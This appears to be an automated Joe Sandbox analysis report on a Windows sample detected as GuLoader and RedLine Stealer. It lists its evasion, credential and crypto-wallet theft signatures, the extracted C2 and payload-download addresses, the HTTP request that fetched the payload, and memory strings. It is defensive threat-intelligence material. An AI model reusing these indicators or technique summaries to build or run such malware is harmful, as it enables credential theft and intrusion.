Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report GR8jRQeRUr

Overview

General Information

Sample Name:GR8jRQeRUr (renamed file extension from none to exe)
Analysis ID:541930
MD5:30a35b83c44aba13ee4ea4ee11003419
SHA1:abbb71291df7529f46f8d5896f1bb60e2a4afc21
SHA256:fee1019ba9c5d5229717f864c5dc8e1b49150b0c4db83f4a2c9b36d51eb03025
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

GuLoader RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Crypto Currency Wallets
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Contains functionality to detect virtual machines (SLDT)
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • GR8jRQeRUr.exe (PID: 6416 cmdline: "C:\Users\user\Desktop\GR8jRQeRUr.exe" MD5: 30A35B83C44ABA13EE4EA4EE11003419)
    • GR8jRQeRUr.exe (PID: 6312 cmdline: "C:\Users\user\Desktop\GR8jRQeRUr.exe" MD5: 30A35B83C44ABA13EE4EA4EE11003419)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": "194.26.229.202:18758", "Bot Id": "private_6"}

Threatname: GuLoader

{"Payload URL": "http://185.112.83.8/RamzersStubed.bin"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000F.00000002.590456261.000000001E680000.00000004.00020000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
              Click to see the 5 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              15.2.GR8jRQeRUr.exe.1e490ee8.3.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                15.2.GR8jRQeRUr.exe.1e210f6e.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  15.2.GR8jRQeRUr.exe.1e210f6e.1.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    15.2.GR8jRQeRUr.exe.1e490000.2.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      15.2.GR8jRQeRUr.exe.1e680000.4.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        Click to see the 5 entries

                        Sigma Overview

                        No Sigma rule has matched

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Found malware configurationShow sources
                        Source: 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmpMalware Configuration Extractor: RedLine {"C2 url": "194.26.229.202:18758", "Bot Id": "private_6"}
                        Source: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://185.112.83.8/RamzersStubed.bin"}
                        Multi AV Scanner detection for submitted fileShow sources
                        Source: GR8jRQeRUr.exeVirustotal: Detection: 13%Perma Link
                        Source: GR8jRQeRUr.exeReversingLabs: Detection: 15%
                        Source: GR8jRQeRUr.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                        Source: GR8jRQeRUr.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: Binary string: _.pdb source: GR8jRQeRUr.exe, 0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.589866449.000000001E1D0000.00000004.00000001.sdmp
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0040290B FindFirstFileW,

                        Networking:

                        barindex
                        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                        Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.3:49798 -> 185.112.83.8:80
                        C2 URLs / IPs found in malware configurationShow sources
                        Source: Malware configuration extractorURLs: http://185.112.83.8/RamzersStubed.bin
                        Source: Joe Sandbox ViewASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
                        Source: Joe Sandbox ViewASN Name: HEANETIE HEANETIE
                        Source: global trafficHTTP traffic detected: GET /RamzersStubed.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 185.112.83.8Cache-Control: no-cache
                        Source: global trafficTCP traffic: 192.168.2.3:49799 -> 194.26.229.202:18758
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: Yl9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587007399.00000000008F8000.00000004.00000020.sdmpString found in binary or memory: http://185.112.83.8/RamzersStubed.bin
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                        Source: GR8jRQeRUr.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: GR8jRQeRUr.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                        Source: GR8jRQeRUr.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                        Source: GR8jRQeRUr.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                        Source: GR8jRQeRUr.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: GR8jRQeRUr.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                        Source: GR8jRQeRUr.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                        Source: GR8jRQeRUr.exeString found in binary or memory: http://ocsp.digicert.com0C
                        Source: GR8jRQeRUr.exeString found in binary or memory: http://ocsp.digicert.com0O
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultl
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm4
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
